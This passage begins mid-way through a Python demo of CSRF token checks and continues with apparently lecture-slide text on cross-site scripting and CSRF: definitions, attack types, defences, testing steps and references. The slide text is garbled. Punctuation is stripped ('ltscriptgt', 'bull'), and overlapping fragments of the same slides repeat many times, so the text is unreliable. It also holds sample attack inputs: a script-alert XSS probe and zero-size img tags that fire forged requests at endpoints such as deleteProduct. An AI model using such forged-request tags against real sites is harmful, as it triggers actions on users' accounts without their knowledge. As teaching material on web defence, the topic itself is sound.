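    if not cookie_token or not _same(cookie_token, form_token):
        return 403, "csrf check failed"
    return 200, "ok"


if __name__ == "__main__":
    sid = create_session("alice")
    legit = {"cookies": {"session": sid},
             "form": {"csrf_token": csrf_token_for(sid), "amount": "100"}}
    forged = {"cookies": {"session": sid}, "form": {"amount": "100"}}
    print(handle_transfer(legit))   # (200, 'transferred 100 for alice')
    print(handle_transfer(forged))  # (403, 'csrf check failed')
```

The double-submit check compares two values that the browser sent and trusts neither on its own; it assumes an attacker cannot set cookies for the application's domain, which is why the session-bound token is the stronger default and the double-submit form is usually the fallback when no server-side session exists.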
Cross Site Scripting
bull XSS is short form of Cross site scripting
bull XSS helps attacker to attack users of a site by injecting a script into
webpage
bull Script gets executed when any user visits the page
bull It does not attack Web application server or Database
bull It breaks the trust User has for the Web application
Key players in XSS
bull Browser
bull External Sources
Browser
1 Browser receives information from server which can be classified as data
and instructions
2 It displays data as normal plain text
3 It executed instructions within instruction context
4 It also executes instructions which are part of data
For example Consider that delivery instructions for a product are entered as
This is a ltscriptgtalert(1)ltscriptgt Test order
Default Browser behavior
User requests a site
Server responds with HTML
CSS Javascript etc files
Browser displays the
content given by site
External Source
bull If an Application does not validate user input properly user input along
with malicious script gets into application
bull Browser executes the script which is part of input when it receives the data
from server in the form of response
Possible Sources of User input
1 Browsers receive information from External sources and Server
2 Form inputs
3 Reviews or Comments
4 Query string parameter values
So improper handling of input data coming from external source is a cause of
Cross site scripting
Sample Scenario
Server
User 1 User 2
User 1 posting comment
which contains ltscriptgt
tags
User 2 views comments
page and Browser
executes script
User 1 steals User 2 data
What can be done by using Cross site scripting
bull Stealing User cookies
bull Stealing confidential information
bull Malicious redirects
gtgtRedirecting to attacker site and asking for login credentials
bull Social engineering
gtgtInjecting new HTML code and asking for Personal information Credit
card details etc
bull Performing Clipboard Theft
Types of Cross Site Scripting
bull Persistent XSS
Injected Script into an input field is stored in web server (database file etc)
and same data is displayed to other users
bull Reflected XSS
Injected script is not stored in server but sent to browser directly for display
purpose and browser executes the script on user browser
bull DOM XSS
Injected script uses DOM data to display section of webpage and other actions
of attacker intention It does not require server side interaction
Example documentURL windowname etc
Preventing XSS
bull Filtering data
If user provides ltscriptgtalert(1)ltscriptgt then after filtering it becomes
alert(1) So the browser simply displays the text and will not execute any
instruction
bull Encoding data
1 If user provides ltscriptgtalert(1)ltscriptgt then after encoding it
becomes ampltscriptampgtalert(1)ampltscriptampgt
2 When the encoded data is sent to browser it will be displayed as
ltscriptgtalert(1)ltscriptgt instead of getting executed as script
Few other methods are used for Preventing XSS hellip
How to Test for XSS vulnerability
1 Identify all input fields like HTTP parameters POST data hidden form
field values and predefined radio or selection values
2 Input specially crafted input data into input fields
3 Analyze the resulting HTML response and search for input data
4 Find the characters which are not properly encoded or filtered out
Tools like ZAP can be used for performing Cross Site Scripting testing in our
web applications
Cross Site Request Forgery
What is CSRF
bull CSRF attack forces end user to execute unwanted actions on a web application in which the user is authenticated currently
bull For example this attack could result in a transfer of funds changing a password or purchasing an item in the users context
bull In effect CSRF attacks are used by an attacker to make a target system perform a function (funds Transfer form submission etc) via the targets browser without knowledge of the target user at least until the unauthorized function has been committed
Sample Scenario
httpwwwgmailcomdeleteAllMessages
Session ID
bull Consider that Gmail relies only on information known to browser
bull For an authenticated user browser will automatically send cookie with
subsequent requests
bull Request in figure can be generated in three ways
1 By the user
2 By the user typing url directly
3 By the user following external link
Victim Site
Why does CSRF usually happen
bull Web browser handling of session information such as cookies and http
authentication information
bull Attacker possessing knowledge of valid web application URLrsquos
For example httpswwwexamplecommyaccountcreditcards
bull Application relying entirely on information which is known by the browser
bull Existence of HTML tags whose presence causes access to the application
resources such as ltimggt tag
For example
ltimg src=httpswwwexamplecomdeleteProduct width=ldquo0rdquo height=ldquo0rdquo gt
How does user involve in CSRF attacks
bull Following the link in an anonymous email or via chat group
Server responds to the request because User session information is
automatically sent by browser with the request
bull When user follows a link which refers to a page containing following
HTML
lthtmlgtltbodygt
ltimg src=ldquohttpwwwexamplecomactionrdquo gt
ltbodygtlthtmlgt
Facts about CSRF
bull Customers of a bank in Mexico were attacked with an email with img tag
The link in img tag changed DNS entry for bank in their routers and
pointed to a malicious website impersonating the bank
bull About 18 million users of EBay lsquos internet auction in Korea lost their
personal information
bull CSRF is ranked as 8th vulnerability in OWASP Top ten vulnerabilities list
How to Test for CSRF weakness in a web application
bull Consider a URL u=httpwwwexamplecomaction
bull Build an HTML page which contains a http request referencing URL u
bull Make sure user is logged into application
bull Induce him into following the link pointing the URL to be tested
bull Check if the web server is executing the request
Preventing CSRF attacks
bull Including CSRF tokens for each user session
bull Submission of double cookies
bull Log out from the sensitive applications when the work is done
bull Do not save any login credentials on the browser
bull Using secure browser extensions
Queries
REFERENCES
bull Owasp Testing Guide
httpswwwowasporgimages552OWASP_Testing_Guide_v4pdf
bull Veracodecom
httpwwwveracodecomsecuritysql-injection
bull Code Project
httpwwwcodeprojectcomArticles877794Preventing-XSS-in-ASP-NET-
Made-Easy
Key players in XSS
bull Browser
bull External Sources
Browser
1 Browser receives information from server which can be classified as data
and instructions
2 It displays data as normal plain text
3 It executed instructions within instruction context
4 It also executes instructions which are part of data
For example Consider that delivery instructions for a product are entered as
This is a ltscriptgtalert(1)ltscriptgt Test order
Default Browser behavior
User requests a site
Server responds with HTML
CSS Javascript etc files
Browser displays the
content given by site
External Source
bull If an Application does not validate user input properly user input along
with malicious script gets into application
bull Browser executes the script which is part of input when it receives the data
from server in the form of response
Possible Sources of User input
1 Browsers receive information from External sources and Server
2 Form inputs
3 Reviews or Comments
4 Query string parameter values
So improper handling of input data coming from external source is a cause of
Cross site scripting
Sample Scenario
Server
User 1 User 2
User 1 posting comment
which contains ltscriptgt
tags
User 2 views comments
page and Browser
executes script
User 1 steals User 2 data
What can be done by using Cross site scripting
bull Stealing User cookies
bull Stealing confidential information
bull Malicious redirects
gtgtRedirecting to attacker site and asking for login credentials
bull Social engineering
gtgtInjecting new HTML code and asking for Personal information Credit
card details etc
bull Performing Clipboard Theft
Types of Cross Site Scripting
bull Persistent XSS
Injected Script into an input field is stored in web server (database file etc)
and same data is displayed to other users
bull Reflected XSS
Injected script is not stored in server but sent to browser directly for display
purpose and browser executes the script on user browser
bull DOM XSS
Injected script uses DOM data to display section of webpage and other actions
of attacker intention It does not require server side interaction
Example documentURL windowname etc
Preventing XSS
bull Filtering data
If user provides ltscriptgtalert(1)ltscriptgt then after filtering it becomes
alert(1) So the browser simply displays the text and will not execute any
instruction
bull Encoding data
1 If user provides ltscriptgtalert(1)ltscriptgt then after encoding it
becomes ampltscriptampgtalert(1)ampltscriptampgt
2 When the encoded data is sent to browser it will be displayed as
ltscriptgtalert(1)ltscriptgt instead of getting executed as script
Few other methods are used for Preventing XSS hellip
How to Test for XSS vulnerability
1 Identify all input fields like HTTP parameters POST data hidden form
field values and predefined radio or selection values
2 Input specially crafted input data into input fields
3 Analyze the resulting HTML response and search for input data
4 Find the characters which are not properly encoded or filtered out
Tools like ZAP can be used for performing Cross Site Scripting testing in our
web applications
Cross Site Request Forgery
What is CSRF
bull CSRF attack forces end user to execute unwanted actions on a web application in which the user is authenticated currently
bull For example this attack could result in a transfer of funds changing a password or purchasing an item in the users context
bull In effect CSRF attacks are used by an attacker to make a target system perform a function (funds Transfer form submission etc) via the targets browser without knowledge of the target user at least until the unauthorized function has been committed
Sample Scenario
httpwwwgmailcomdeleteAllMessages
Session ID
bull Consider that Gmail relies only on information known to browser
bull For an authenticated user browser will automatically send cookie with
subsequent requests
bull Request in figure can be generated in three ways
1 By the user
2 By the user typing url directly
3 By the user following external link
Victim Site
Why does CSRF usually happen
bull Web browser handling of session information such as cookies and http
authentication information
bull Attacker possessing knowledge of valid web application URLrsquos
For example httpswwwexamplecommyaccountcreditcards
bull Application relying entirely on information which is known by the browser
bull Existence of HTML tags whose presence causes access to the application
resources such as ltimggt tag
For example
ltimg src=httpswwwexamplecomdeleteProduct width=ldquo0rdquo height=ldquo0rdquo gt
How does user involve in CSRF attacks
bull Following the link in an anonymous email or via chat group
Server responds to the request because User session information is
automatically sent by browser with the request
bull When user follows a link which refers to a page containing following
HTML
lthtmlgtltbodygt
ltimg src=ldquohttpwwwexamplecomactionrdquo gt
ltbodygtlthtmlgt
Facts about CSRF
bull Customers of a bank in Mexico were attacked with an email with img tag
The link in img tag changed DNS entry for bank in their routers and
pointed to a malicious website impersonating the bank
bull About 18 million users of EBay lsquos internet auction in Korea lost their
personal information
bull CSRF is ranked as 8th vulnerability in OWASP Top ten vulnerabilities list
How to Test for CSRF weakness in a web application
bull Consider a URL u=httpwwwexamplecomaction
bull Build an HTML page which contains a http request referencing URL u
bull Make sure user is logged into application
bull Induce him into following the link pointing the URL to be tested
bull Check if the web server is executing the request
Preventing CSRF attacks
bull Including CSRF tokens for each user session
bull Submission of double cookies
bull Log out from the sensitive applications when the work is done
bull Do not save any login credentials on the browser
bull Using secure browser extensions
Queries
REFERENCES
bull Owasp Testing Guide
httpswwwowasporgimages552OWASP_Testing_Guide_v4pdf
bull Veracodecom
httpwwwveracodecomsecuritysql-injection
bull Code Project
httpwwwcodeprojectcomArticles877794Preventing-XSS-in-ASP-NET-
Made-Easy
Default Browser behavior
User requests a site
Server responds with HTML
CSS Javascript etc files
Browser displays the
content given by site
External Source
bull If an Application does not validate user input properly user input along
with malicious script gets into application
bull Browser executes the script which is part of input when it receives the data
from server in the form of response
Possible Sources of User input
1 Browsers receive information from External sources and Server
2 Form inputs
3 Reviews or Comments
4 Query string parameter values
So improper handling of input data coming from external source is a cause of
Cross site scripting
Sample Scenario
Server
User 1 User 2
User 1 posting comment
which contains ltscriptgt
tags
User 2 views comments
page and Browser
executes script
User 1 steals User 2 data
What can be done by using Cross site scripting
bull Stealing User cookies
bull Stealing confidential information
bull Malicious redirects
gtgtRedirecting to attacker site and asking for login credentials
bull Social engineering
gtgtInjecting new HTML code and asking for Personal information Credit
card details etc
bull Performing Clipboard Theft
Types of Cross Site Scripting
bull Persistent XSS
Injected Script into an input field is stored in web server (database file etc)
and same data is displayed to other users
bull Reflected XSS
Injected script is not stored in server but sent to browser directly for display
purpose and browser executes the script on user browser
bull DOM XSS
Injected script uses DOM data to display section of webpage and other actions
of attacker intention It does not require server side interaction
Example documentURL windowname etc
Preventing XSS
bull Filtering data
If user provides ltscriptgtalert(1)ltscriptgt then after filtering it becomes
alert(1) So the browser simply displays the text and will not execute any
instruction
bull Encoding data
1 If user provides ltscriptgtalert(1)ltscriptgt then after encoding it
becomes ampltscriptampgtalert(1)ampltscriptampgt
2 When the encoded data is sent to browser it will be displayed as
ltscriptgtalert(1)ltscriptgt instead of getting executed as script
Few other methods are used for Preventing XSS hellip
How to Test for XSS vulnerability
1 Identify all input fields like HTTP parameters POST data hidden form
field values and predefined radio or selection values
2 Input specially crafted input data into input fields
3 Analyze the resulting HTML response and search for input data
4 Find the characters which are not properly encoded or filtered out
Tools like ZAP can be used for performing Cross Site Scripting testing in our
web applications
Cross Site Request Forgery
What is CSRF
bull CSRF attack forces end user to execute unwanted actions on a web application in which the user is authenticated currently
bull For example this attack could result in a transfer of funds changing a password or purchasing an item in the users context
bull In effect CSRF attacks are used by an attacker to make a target system perform a function (funds Transfer form submission etc) via the targets browser without knowledge of the target user at least until the unauthorized function has been committed
Sample Scenario
httpwwwgmailcomdeleteAllMessages
Session ID
bull Consider that Gmail relies only on information known to browser
bull For an authenticated user browser will automatically send cookie with
subsequent requests
bull Request in figure can be generated in three ways
1 By the user
2 By the user typing url directly
3 By the user following external link
Victim Site
Why does CSRF usually happen
bull Web browser handling of session information such as cookies and http
authentication information
bull Attacker possessing knowledge of valid web application URLrsquos
For example httpswwwexamplecommyaccountcreditcards
bull Application relying entirely on information which is known by the browser
bull Existence of HTML tags whose presence causes access to the application
resources such as ltimggt tag
For example
ltimg src=httpswwwexamplecomdeleteProduct width=ldquo0rdquo height=ldquo0rdquo gt
How does user involve in CSRF attacks
bull Following the link in an anonymous email or via chat group
Server responds to the request because User session information is
automatically sent by browser with the request
bull When user follows a link which refers to a page containing following
HTML
lthtmlgtltbodygt
ltimg src=ldquohttpwwwexamplecomactionrdquo gt
ltbodygtlthtmlgt
Facts about CSRF
bull Customers of a bank in Mexico were attacked with an email with img tag
The link in img tag changed DNS entry for bank in their routers and
pointed to a malicious website impersonating the bank
bull About 18 million users of EBay lsquos internet auction in Korea lost their
personal information
bull CSRF is ranked as 8th vulnerability in OWASP Top ten vulnerabilities list
How to Test for CSRF weakness in a web application
bull Consider a URL u=httpwwwexamplecomaction
bull Build an HTML page which contains a http request referencing URL u
bull Make sure user is logged into application
bull Induce him into following the link pointing the URL to be tested
bull Check if the web server is executing the request
Preventing CSRF attacks
bull Including CSRF tokens for each user session
bull Submission of double cookies
bull Log out from the sensitive applications when the work is done
bull Do not save any login credentials on the browser
bull Using secure browser extensions
Queries
REFERENCES
bull Owasp Testing Guide
httpswwwowasporgimages552OWASP_Testing_Guide_v4pdf
bull Veracodecom
httpwwwveracodecomsecuritysql-injection
bull Code Project
httpwwwcodeprojectcomArticles877794Preventing-XSS-in-ASP-NET-
Made-Easy
External Source
bull If an Application does not validate user input properly user input along
with malicious script gets into application
bull Browser executes the script which is part of input when it receives the data
from server in the form of response
Possible Sources of User input
1 Browsers receive information from External sources and Server
2 Form inputs
3 Reviews or Comments
4 Query string parameter values
So improper handling of input data coming from external source is a cause of
Cross site scripting
Sample Scenario
Server
User 1 User 2
User 1 posting comment
which contains ltscriptgt
tags
User 2 views comments
page and Browser
executes script
User 1 steals User 2 data
What can be done by using Cross site scripting
bull Stealing User cookies
bull Stealing confidential information
bull Malicious redirects
gtgtRedirecting to attacker site and asking for login credentials
bull Social engineering
gtgtInjecting new HTML code and asking for Personal information Credit
card details etc
bull Performing Clipboard Theft
Types of Cross Site Scripting
bull Persistent XSS
Injected Script into an input field is stored in web server (database file etc)
and same data is displayed to other users
bull Reflected XSS
Injected script is not stored in server but sent to browser directly for display
purpose and browser executes the script on user browser
bull DOM XSS
Injected script uses DOM data to display section of webpage and other actions
of attacker intention It does not require server side interaction
Example documentURL windowname etc
Preventing XSS
bull Filtering data
If user provides ltscriptgtalert(1)ltscriptgt then after filtering it becomes
alert(1) So the browser simply displays the text and will not execute any
instruction
bull Encoding data
1 If user provides ltscriptgtalert(1)ltscriptgt then after encoding it
becomes ampltscriptampgtalert(1)ampltscriptampgt
2 When the encoded data is sent to browser it will be displayed as
ltscriptgtalert(1)ltscriptgt instead of getting executed as script
Few other methods are used for Preventing XSS hellip
How to Test for XSS vulnerability
1 Identify all input fields like HTTP parameters POST data hidden form
field values and predefined radio or selection values
2 Input specially crafted input data into input fields
3 Analyze the resulting HTML response and search for input data
4 Find the characters which are not properly encoded or filtered out
Tools like ZAP can be used for performing Cross Site Scripting testing in our
web applications
Cross Site Request Forgery
What is CSRF
• A CSRF attack forces an end user to execute unwanted actions on a web application in which the user is currently authenticated.
• For example, this attack could result in a transfer of funds, a changed password, or a purchased item in the user's context.
• In effect, CSRF attacks are used by an attacker to make a target system perform a function (funds transfer, form submission, etc.) via the target's browser without the knowledge of the target user, at least until the unauthorized function has been committed.
Sample Scenario
(Figure: a request to http://www.gmail.com/deleteAllMessages carrying the Session ID is sent from the browser to the Victim Site.)
• Consider that Gmail relies only on information known to the browser.
• For an authenticated user, the browser will automatically send the cookie with subsequent requests.
• The request in the figure can be generated in three ways:
  1. By the user
  2. By the user typing the URL directly
  3. By the user following an external link
Why does CSRF usually happen
• Web browser handling of session information such as cookies and HTTP authentication information
• The attacker possessing knowledge of valid web application URLs
  For example: https://www.example.com/myaccount/creditcards
• The application relying entirely on information which is known by the browser
• The existence of HTML tags whose presence causes access to application resources, such as the <img> tag
  For example:
  <img src="https://www.example.com/deleteProduct" width="0" height="0">
How does the user get involved in CSRF attacks
• Following a link in an anonymous email or via a chat group
  The server responds to the request because the user's session information is automatically sent by the browser with the request.
• When the user follows a link which refers to a page containing the following HTML:
  <html><body>
  <img src="http://www.example.com/action">
  </body></html>
Facts about CSRF
• Customers of a bank in Mexico were attacked with an email containing an img tag. The link in the img tag changed the DNS entry for the bank in their routers and pointed it to a malicious website impersonating the bank.
• About 18 million users of eBay's internet auction site in Korea lost their personal information.
• CSRF is ranked as the 8th vulnerability in the OWASP Top Ten vulnerabilities list.
How to Test for a CSRF weakness in a web application
• Consider a URL u = http://www.example.com/action
• Build an HTML page which contains an HTTP request referencing URL u
• Make sure the user is logged into the application
• Induce him into following the link pointing to the URL to be tested
• Check if the web server is executing the request
Preventing CSRF attacks
• Including CSRF tokens for each user session
• Submission of double cookies (double-submit cookie)
• Log out from sensitive applications when the work is done
• Do not save any login credentials in the browser
• Using secure browser extensions
Queries
REFERENCES
• OWASP Testing Guide
  https://www.owasp.org/images/5/52/OWASP_Testing_Guide_v4.pdf
• Veracode.com
  http://www.veracode.com/security/sql-injection
• Code Project
  http://www.codeproject.com/Articles/877794/Preventing-XSS-in-ASP-NET-Made-Easy
Sample Scenario (XSS figure: User 1 posts a comment containing <script> tags to the server; User 2 views the comments page and the browser executes the script; User 1 steals User 2's data.)
What can be done by using Cross site scripting
bull Stealing User cookies
bull Stealing confidential information
bull Malicious redirects
gtgtRedirecting to attacker site and asking for login credentials
bull Social engineering
gtgtInjecting new HTML code and asking for Personal information Credit
card details etc
bull Performing Clipboard Theft
Types of Cross Site Scripting
bull Persistent XSS
Injected Script into an input field is stored in web server (database file etc)
and same data is displayed to other users
bull Reflected XSS
Injected script is not stored in server but sent to browser directly for display
purpose and browser executes the script on user browser
bull DOM XSS
Injected script uses DOM data to display section of webpage and other actions
of attacker intention It does not require server side interaction
Example documentURL windowname etc
Preventing XSS
bull Filtering data
If user provides ltscriptgtalert(1)ltscriptgt then after filtering it becomes
alert(1) So the browser simply displays the text and will not execute any
instruction
bull Encoding data
1 If user provides ltscriptgtalert(1)ltscriptgt then after encoding it
becomes ampltscriptampgtalert(1)ampltscriptampgt
2 When the encoded data is sent to browser it will be displayed as
ltscriptgtalert(1)ltscriptgt instead of getting executed as script
Few other methods are used for Preventing XSS hellip
How to Test for XSS vulnerability
1 Identify all input fields like HTTP parameters POST data hidden form
field values and predefined radio or selection values
2 Input specially crafted input data into input fields
3 Analyze the resulting HTML response and search for input data
4 Find the characters which are not properly encoded or filtered out
Tools like ZAP can be used for performing Cross Site Scripting testing in our
web applications
Cross Site Request Forgery
What is CSRF
bull CSRF attack forces end user to execute unwanted actions on a web application in which the user is authenticated currently
bull For example this attack could result in a transfer of funds changing a password or purchasing an item in the users context
bull In effect CSRF attacks are used by an attacker to make a target system perform a function (funds Transfer form submission etc) via the targets browser without knowledge of the target user at least until the unauthorized function has been committed
Sample Scenario
httpwwwgmailcomdeleteAllMessages
Session ID
bull Consider that Gmail relies only on information known to browser
bull For an authenticated user browser will automatically send cookie with
subsequent requests
bull Request in figure can be generated in three ways
1 By the user
2 By the user typing url directly
3 By the user following external link
Victim Site
Why does CSRF usually happen
bull Web browser handling of session information such as cookies and http
authentication information
bull Attacker possessing knowledge of valid web application URLrsquos
For example httpswwwexamplecommyaccountcreditcards
bull Application relying entirely on information which is known by the browser
bull Existence of HTML tags whose presence causes access to the application
resources such as ltimggt tag
For example
ltimg src=httpswwwexamplecomdeleteProduct width=ldquo0rdquo height=ldquo0rdquo gt
How does user involve in CSRF attacks
bull Following the link in an anonymous email or via chat group
Server responds to the request because User session information is
automatically sent by browser with the request
bull When user follows a link which refers to a page containing following
HTML
lthtmlgtltbodygt
ltimg src=ldquohttpwwwexamplecomactionrdquo gt
ltbodygtlthtmlgt
Facts about CSRF
bull Customers of a bank in Mexico were attacked with an email with img tag
The link in img tag changed DNS entry for bank in their routers and
pointed to a malicious website impersonating the bank
bull About 18 million users of EBay lsquos internet auction in Korea lost their
personal information
bull CSRF is ranked as 8th vulnerability in OWASP Top ten vulnerabilities list
How to Test for CSRF weakness in a web application
bull Consider a URL u=httpwwwexamplecomaction
bull Build an HTML page which contains a http request referencing URL u
bull Make sure user is logged into application
bull Induce him into following the link pointing the URL to be tested
bull Check if the web server is executing the request
Preventing CSRF attacks
bull Including CSRF tokens for each user session
bull Submission of double cookies
bull Log out from the sensitive applications when the work is done
bull Do not save any login credentials on the browser
bull Using secure browser extensions
Queries
REFERENCES
bull Owasp Testing Guide
httpswwwowasporgimages552OWASP_Testing_Guide_v4pdf
bull Veracodecom
httpwwwveracodecomsecuritysql-injection
bull Code Project
httpwwwcodeprojectcomArticles877794Preventing-XSS-in-ASP-NET-
Made-Easy
What can be done by using Cross site scripting
bull Stealing User cookies
bull Stealing confidential information
bull Malicious redirects
gtgtRedirecting to attacker site and asking for login credentials
bull Social engineering
gtgtInjecting new HTML code and asking for Personal information Credit
card details etc
bull Performing Clipboard Theft
Types of Cross Site Scripting
bull Persistent XSS
Injected Script into an input field is stored in web server (database file etc)
and same data is displayed to other users
bull Reflected XSS
Injected script is not stored in server but sent to browser directly for display
purpose and browser executes the script on user browser
bull DOM XSS
Injected script uses DOM data to display section of webpage and other actions
of attacker intention It does not require server side interaction
Example documentURL windowname etc
Preventing XSS
bull Filtering data
If user provides ltscriptgtalert(1)ltscriptgt then after filtering it becomes
alert(1) So the browser simply displays the text and will not execute any
instruction
bull Encoding data
1 If user provides ltscriptgtalert(1)ltscriptgt then after encoding it
becomes ampltscriptampgtalert(1)ampltscriptampgt
2 When the encoded data is sent to browser it will be displayed as
ltscriptgtalert(1)ltscriptgt instead of getting executed as script
Few other methods are used for Preventing XSS hellip
How to Test for XSS vulnerability
1 Identify all input fields like HTTP parameters POST data hidden form
field values and predefined radio or selection values
2 Input specially crafted input data into input fields
3 Analyze the resulting HTML response and search for input data
4 Find the characters which are not properly encoded or filtered out
Tools like ZAP can be used for performing Cross Site Scripting testing in our
web applications
Cross Site Request Forgery
What is CSRF
bull CSRF attack forces end user to execute unwanted actions on a web application in which the user is authenticated currently
bull For example this attack could result in a transfer of funds changing a password or purchasing an item in the users context
bull In effect CSRF attacks are used by an attacker to make a target system perform a function (funds Transfer form submission etc) via the targets browser without knowledge of the target user at least until the unauthorized function has been committed
Sample Scenario
httpwwwgmailcomdeleteAllMessages
Session ID
bull Consider that Gmail relies only on information known to browser
bull For an authenticated user browser will automatically send cookie with
subsequent requests
bull Request in figure can be generated in three ways
1 By the user
2 By the user typing url directly
3 By the user following external link
Victim Site
Why does CSRF usually happen
bull Web browser handling of session information such as cookies and http
authentication information
bull Attacker possessing knowledge of valid web application URLrsquos
For example httpswwwexamplecommyaccountcreditcards
bull Application relying entirely on information which is known by the browser
bull Existence of HTML tags whose presence causes access to the application
resources such as ltimggt tag
For example
ltimg src=httpswwwexamplecomdeleteProduct width=ldquo0rdquo height=ldquo0rdquo gt
How does user involve in CSRF attacks
bull Following the link in an anonymous email or via chat group
Server responds to the request because User session information is
automatically sent by browser with the request
bull When user follows a link which refers to a page containing following
HTML
lthtmlgtltbodygt
ltimg src=ldquohttpwwwexamplecomactionrdquo gt
ltbodygtlthtmlgt
Facts about CSRF
bull Customers of a bank in Mexico were attacked with an email with img tag
The link in img tag changed DNS entry for bank in their routers and
pointed to a malicious website impersonating the bank
bull About 18 million users of EBay lsquos internet auction in Korea lost their
personal information
bull CSRF is ranked as 8th vulnerability in OWASP Top ten vulnerabilities list
How to Test for CSRF weakness in a web application
bull Consider a URL u=httpwwwexamplecomaction
bull Build an HTML page which contains a http request referencing URL u
bull Make sure user is logged into application
bull Induce him into following the link pointing the URL to be tested
bull Check if the web server is executing the request
Preventing CSRF attacks
bull Including CSRF tokens for each user session
bull Submission of double cookies
bull Log out from the sensitive applications when the work is done
bull Do not save any login credentials on the browser
bull Using secure browser extensions
Queries
REFERENCES
bull Owasp Testing Guide
httpswwwowasporgimages552OWASP_Testing_Guide_v4pdf
bull Veracodecom
httpwwwveracodecomsecuritysql-injection
bull Code Project
httpwwwcodeprojectcomArticles877794Preventing-XSS-in-ASP-NET-
Made-Easy
Types of Cross Site Scripting
bull Persistent XSS
Injected Script into an input field is stored in web server (database file etc)
and same data is displayed to other users
bull Reflected XSS
Injected script is not stored in server but sent to browser directly for display
purpose and browser executes the script on user browser
bull DOM XSS
Injected script uses DOM data to display section of webpage and other actions
of attacker intention It does not require server side interaction
Example documentURL windowname etc
Preventing XSS
bull Filtering data
If user provides ltscriptgtalert(1)ltscriptgt then after filtering it becomes
alert(1) So the browser simply displays the text and will not execute any
instruction
bull Encoding data
1 If user provides ltscriptgtalert(1)ltscriptgt then after encoding it
becomes ampltscriptampgtalert(1)ampltscriptampgt
2 When the encoded data is sent to browser it will be displayed as
ltscriptgtalert(1)ltscriptgt instead of getting executed as script
Few other methods are used for Preventing XSS hellip
How to Test for XSS vulnerability
1 Identify all input fields like HTTP parameters POST data hidden form
field values and predefined radio or selection values
2 Input specially crafted input data into input fields
3 Analyze the resulting HTML response and search for input data
4 Find the characters which are not properly encoded or filtered out
Tools like ZAP can be used for performing Cross Site Scripting testing in our
web applications
Cross Site Request Forgery
What is CSRF
bull CSRF attack forces end user to execute unwanted actions on a web application in which the user is authenticated currently
bull For example this attack could result in a transfer of funds changing a password or purchasing an item in the users context
bull In effect CSRF attacks are used by an attacker to make a target system perform a function (funds Transfer form submission etc) via the targets browser without knowledge of the target user at least until the unauthorized function has been committed
Sample Scenario
httpwwwgmailcomdeleteAllMessages
Session ID
bull Consider that Gmail relies only on information known to browser
bull For an authenticated user browser will automatically send cookie with
subsequent requests
bull Request in figure can be generated in three ways
1 By the user
2 By the user typing url directly
3 By the user following external link
Victim Site
Why does CSRF usually happen
bull Web browser handling of session information such as cookies and http
authentication information
bull Attacker possessing knowledge of valid web application URLrsquos
For example httpswwwexamplecommyaccountcreditcards
bull Application relying entirely on information which is known by the browser
bull Existence of HTML tags whose presence causes access to the application
resources such as ltimggt tag
For example
ltimg src=httpswwwexamplecomdeleteProduct width=ldquo0rdquo height=ldquo0rdquo gt
How does user involve in CSRF attacks
bull Following the link in an anonymous email or via chat group
Server responds to the request because User session information is
automatically sent by browser with the request
bull When user follows a link which refers to a page containing following
HTML
lthtmlgtltbodygt
ltimg src=ldquohttpwwwexamplecomactionrdquo gt
ltbodygtlthtmlgt
Facts about CSRF
bull Customers of a bank in Mexico were attacked with an email with img tag
The link in img tag changed DNS entry for bank in their routers and
pointed to a malicious website impersonating the bank
bull About 18 million users of EBay lsquos internet auction in Korea lost their
personal information
bull CSRF is ranked as 8th vulnerability in OWASP Top ten vulnerabilities list
How to Test for CSRF weakness in a web application
bull Consider a URL u=httpwwwexamplecomaction
bull Build an HTML page which contains a http request referencing URL u
bull Make sure user is logged into application
bull Induce him into following the link pointing the URL to be tested
bull Check if the web server is executing the request
Preventing CSRF attacks
bull Including CSRF tokens for each user session
bull Submission of double cookies
bull Log out from the sensitive applications when the work is done
bull Do not save any login credentials on the browser
bull Using secure browser extensions
Queries
REFERENCES
bull Owasp Testing Guide
httpswwwowasporgimages552OWASP_Testing_Guide_v4pdf
bull Veracodecom
httpwwwveracodecomsecuritysql-injection
bull Code Project
httpwwwcodeprojectcomArticles877794Preventing-XSS-in-ASP-NET-
Made-Easy
Preventing XSS
bull Filtering data
If user provides ltscriptgtalert(1)ltscriptgt then after filtering it becomes
alert(1) So the browser simply displays the text and will not execute any
instruction
bull Encoding data
1 If user provides ltscriptgtalert(1)ltscriptgt then after encoding it
becomes ampltscriptampgtalert(1)ampltscriptampgt
2 When the encoded data is sent to browser it will be displayed as
ltscriptgtalert(1)ltscriptgt instead of getting executed as script
Few other methods are used for Preventing XSS hellip
How to Test for XSS vulnerability
1 Identify all input fields like HTTP parameters POST data hidden form
field values and predefined radio or selection values
2 Input specially crafted input data into input fields
3 Analyze the resulting HTML response and search for input data
4 Find the characters which are not properly encoded or filtered out
Tools like ZAP can be used for performing Cross Site Scripting testing in our
web applications
Cross Site Request Forgery
What is CSRF
bull CSRF attack forces end user to execute unwanted actions on a web application in which the user is authenticated currently
bull For example this attack could result in a transfer of funds changing a password or purchasing an item in the users context
bull In effect CSRF attacks are used by an attacker to make a target system perform a function (funds Transfer form submission etc) via the targets browser without knowledge of the target user at least until the unauthorized function has been committed
Sample Scenario
httpwwwgmailcomdeleteAllMessages
Session ID
bull Consider that Gmail relies only on information known to browser
bull For an authenticated user browser will automatically send cookie with
subsequent requests
bull Request in figure can be generated in three ways
1 By the user
2 By the user typing url directly
3 By the user following external link
Victim Site
Why does CSRF usually happen
bull Web browser handling of session information such as cookies and http
authentication information
bull Attacker possessing knowledge of valid web application URLrsquos
For example httpswwwexamplecommyaccountcreditcards
bull Application relying entirely on information which is known by the browser
bull Existence of HTML tags whose presence causes access to the application
resources such as ltimggt tag
For example
ltimg src=httpswwwexamplecomdeleteProduct width=ldquo0rdquo height=ldquo0rdquo gt
How does user involve in CSRF attacks
bull Following the link in an anonymous email or via chat group
Server responds to the request because User session information is
automatically sent by browser with the request
bull When user follows a link which refers to a page containing following
HTML
lthtmlgtltbodygt
ltimg src=ldquohttpwwwexamplecomactionrdquo gt
ltbodygtlthtmlgt
Facts about CSRF
bull Customers of a bank in Mexico were attacked with an email with img tag
The link in img tag changed DNS entry for bank in their routers and
pointed to a malicious website impersonating the bank
bull About 18 million users of EBay lsquos internet auction in Korea lost their
personal information
bull CSRF is ranked as 8th vulnerability in OWASP Top ten vulnerabilities list
How to Test for CSRF weakness in a web application
bull Consider a URL u=httpwwwexamplecomaction
bull Build an HTML page which contains a http request referencing URL u
bull Make sure user is logged into application
bull Induce him into following the link pointing the URL to be tested
bull Check if the web server is executing the request
Preventing CSRF attacks
bull Including CSRF tokens for each user session
bull Submission of double cookies
bull Log out from the sensitive applications when the work is done
bull Do not save any login credentials on the browser
bull Using secure browser extensions
Queries
REFERENCES
